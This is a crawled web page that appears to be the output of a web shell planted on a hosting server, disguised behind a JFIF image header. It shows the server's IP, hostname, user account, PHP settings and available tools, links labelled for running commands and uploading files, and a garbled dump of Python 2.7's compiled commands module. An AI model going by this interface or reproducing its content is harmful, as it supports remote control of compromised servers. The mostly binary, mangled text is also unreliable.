����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.191.28.200 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /lib64/python2.7/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
� zfc @ si d Z d d l m Z e d d d �[ d d d g Z d � Z d � Z d � Z d � Z d � Z d S( s- Execute shell commands via os.popen() and return status, output. Interface summary: import commands outtext = commands.getoutput(cmd) (exitstatus, outtext) = commands.getstatusoutput(cmd) outtext = commands.getstatus(file) # returns output of "ls -ld file" A trailing newline is removed from the output string. Encapsulates the basic operation: pipe = os.popen('{ ' + cmd + '; } 2>&1', 'r') text = pipe.read() sts = pipe.close() [Note: it would be nice to add functions to interpret the exit status.] i����( t warnpy3ksU the commands module has been removed in Python 3.0; use the subprocess module insteadt stackleveli t getstatusoutputt getoutputt getstatusc C s3 d d l } | j d t d � t d t | � � S( s- Return output of "ls -ld <file>" in a string.i����Ns"